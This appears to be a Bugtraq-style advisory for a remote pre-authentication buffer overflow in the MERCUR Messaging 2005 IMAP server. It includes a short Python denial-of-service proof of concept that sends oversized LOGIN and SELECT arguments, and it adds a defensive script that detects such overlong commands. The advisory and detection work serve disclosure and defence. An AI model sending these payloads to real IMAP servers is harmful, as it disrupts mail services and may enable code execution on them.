MERCUR Messaging 2005 IMAP Remote Buffer Overflow Vulnerability
BID:17138
Info
| Bugtraq ID: | 17138 |
| Class: | Boundary Condition Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 17 2006 12:00AM |
| Updated: | Jan 16 2007 06:00PM |
| Credit: | Discovered by Tim Taylor. |
| Vulnerable: | Atrium Software MERCUR Messaging 2005 Standard Edition 5.0 SP3; Atrium Software MERCUR Messaging 2005 Lite Edition 5.0 SP3; Atrium Software MERCUR Messaging 2005 Enterprise Edition 5.0 SP3 |
| Not Vulnerable: | |
Discussion
MERCUR Messaging 2005 is prone to a remote buffer-overflow vulnerability.
The vulnerability presents itself when the server handles specially crafted IMAP commands.
This may result in memory corruption leading to a denial-of-service condition or arbitrary code execution.
MERCUR Messaging 2005 version 5.0 SP3 is reported to be vulnerable. Other versions may be affected as well.
Exploit / POC
The following proof of concept is available:
-- DoS Exploit --
```python
# Atrium Mercur IMAP 5.0 SP3 DoS Exploit
# pre-authentication buffer overflow in IMAP command login
import socket
s=socket.socket()
s.connect(("127.0.0.1", 143))
print s.recv(256)  # server greeting
s.send("a001 login " + "\x41" * 275 + "\r\n")

# buffer overflow in IMAP commands like select and others
import socket
s=socket.socket()
s.connect(("127.0.0.1", 143))
print s.recv(256)  # server greeting
s.send("a001 login test test\r\n")
print s.recv(256)  # login response
s.send("a002 select " + "\x41" * 239 + "\r\n")
```
Exploit code as part of the Metasploit Framework project has been released.
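Added example (not part of the original advisory or the vendor's fix): a detection-side check that inspects client-to-server IMAP lines and flags LOGIN or SELECT commands whose longest argument exceeds a length cut-off. The 200-byte threshold, the function names and the sample lines are assumptions constructed for illustration.

```python
import re

# Assumption: 200 bytes is a constructed cut-off sitting below the 239- and
# 275-byte arguments in the advisory's PoC; it is not a vendor-documented limit.
MAX_ARG_LEN = 200
# Commands the advisory names; it says "select and others" without listing them.
WATCHED = {"LOGIN", "SELECT"}
TOKEN = re.compile(r'"((?:[^"\\]|\\.)*)"|(\S+)')


def split_args(rest):
    """Split IMAP arguments, treating a quoted string as one token."""
    return [quoted or bare for quoted, bare in TOKEN.findall(rest)]


def inspect_line(raw):
    """Return a finding for one client-to-server IMAP line, or None."""
    parts = raw.rstrip(b"\r\n").decode("latin-1").split(" ", 2)
    if len(parts) < 3:
        return None                      # no arguments to measure
    tag, command, rest = parts
    command = command.upper()            # IMAP command names are case-insensitive
    if command not in WATCHED:
        return None
    longest = max(split_args(rest), key=len, default="")
    if len(longest) <= MAX_ARG_LEN:
        return None
    return {
        "tag": tag,
        "command": command,
        "arg_len": len(longest),
        # One distinct byte means pure padding, as in the PoC's "\x41" run.
        "distinct_bytes": len(set(longest)),
    }


def scan(lines):
    """Inspect every line and keep only the findings."""
    return [f for f in map(inspect_line, lines) if f]


# Constructed sample traffic (client side only), not captured from a real server.
SAMPLE = [
    b"a001 login alice s3cret\r\n",
    b"a001 login " + b"\x41" * 275 + b"\r\n",
    b"a002 select INBOX\r\n",
    b'a003 select "Archive/2006 Reports"\r\n',
    b"a004 select " + b"\x41" * 239 + b"\r\n",
]
```

The LOGIN check matters most because that command is processed before authentication, so the flagged line can come from any host that can reach port 143.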
Solution / Fix
Solution:
The vendor has released fixes to address this issue.
References
References:
- MERCUR Messaging 2005 (Atrium Software)